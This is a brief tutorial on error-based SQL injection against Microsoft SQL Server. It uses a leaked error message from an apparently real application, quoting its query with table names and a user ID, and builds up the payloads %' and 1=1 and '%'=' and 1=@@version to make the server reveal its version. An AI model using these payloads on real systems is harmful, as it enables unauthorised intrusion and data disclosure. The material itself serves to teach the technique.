Q: You run into a SQL injection that throws errors. What do you do?
1. First, copy out part of the statement:
SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at …… (a very long SQL statement follows)
2. How do you approach such a complex statement? Simplify the statement above so it is easier to analyse:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%') …… (there is a lot more after this, which we ignore)
Okay, now let's look at how the injection works.
Using an always-true condition to perform the SQL injection:
(If you skip the always-true condition and go straight to ' and 1=@@version+-- , then with a statement this complex you break the logic of the whole SQL statement, the query fails to execute, and you never get the version.)
1. What if the statement is very complex? Then reduce it to the statement below, so the complexity doesn't throw you off:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')
2. Insert the fragment %' and 1=1 and '%'=' so that the statement concatenates cleanly and does not raise an error:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')
3. Now make trouble: change 1=1 to 1=@@version. The condition can no longer evaluate as "true", the database raises an error, and that error message discloses the database version:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')